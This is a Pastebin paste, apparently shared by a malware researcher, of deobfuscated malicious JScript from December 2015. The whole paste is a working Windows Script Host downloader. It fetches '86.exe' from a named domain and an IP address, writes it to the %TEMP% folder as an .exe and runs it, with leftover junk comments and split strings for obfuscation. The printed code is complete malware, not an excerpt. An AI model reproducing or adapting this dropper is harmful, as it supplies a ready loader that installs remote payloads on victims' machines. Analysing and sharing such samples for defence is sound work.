dynamoo

Malicious deobfuscated Javascript

Dec 10th, 2015
258
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1.  
  2.  
  3.  
  4.  
  5. var I = "softextrain64.com/86.exe? 46.151.52.196/86.exe? ? ?".split(" ");
  6.  
  7. var cMu =((1/*RZvo203306596n275206uM354193eOiZ*/)?"WScri":"")+"pt.Shell";
  8.  
  9. var lQ = WScript.CreateObject(cMu);
  10.  
  11. var Wg = "%TEMP%\\";
  12.  
  13. var nah = lQ.ExpandEnvironmentStrings(Wg);
  14.  
  15. var GUw = "2.XMLH";
  16.  
  17. var RKH = GUw + "TTP";
  18.  
  19. var wv = true  , glsT = "ADOD";
  20.  
  21. var nM = WScript.CreateObject("MS"+"XML"+(234659, RKH));
  22.  
  23. var Qit = WScript.CreateObject(glsT + "B.St"+(824994, "ream"));
  24.  
  25. var Kqf = 0;
  26.  
  27. var r = 1;
  28.  
  29. var BfEGqJV = 931041;
  30.  
  31. for (var i=Kqf; i<I.length; i++)  {
  32.  
  33.   var Qt = 0;
  34.  
  35.   try  {
  36.  
  37.     poi = "GET";     
  38.  
  39.     nM.open(poi,"http://"+I[i]+r, false); nM.send(); if (nM.status == 741-541)  {
  40.  
  41.       Qit.open(); Qit.type = 1; Qit.write(nM.responseBody); if (Qit.size > 18336-826)  {
  42.  
  43.         Qt = 1; Qit.position = 0; Qit.saveToFile/*cpmi15UCF2*/(nah/*pdFH17NQtI*/+BfEGqJV+".exe",4-2); try  {
  44.  
  45.           if (((new Date())>0,796234888)) {
  46.  
  47.             lQ./*d856158GVxk*/Run(nah+BfEGqJV+/*Euyi21RZKg*/".exe",/*zrdQ8470gT*/3-2,0);
  48.  
  49.             break;
  50.  
  51.           }
  52.  
  53.         }
  54.  
  55.         catch (rw)  {
  56.  
  57.         };
  58.  
  59.       }; Qit.close();
  60.  
  61.     };
  62.  
  63.     if (Qt == 1)  {
  64.  
  65.       Kqf = i; break;
  66.  
  67.     };
  68.  
  69.   }
  70.  
  71.   catch (rw)  {
  72.  
  73.   };
  74.  
  75. };
RAW Paste Data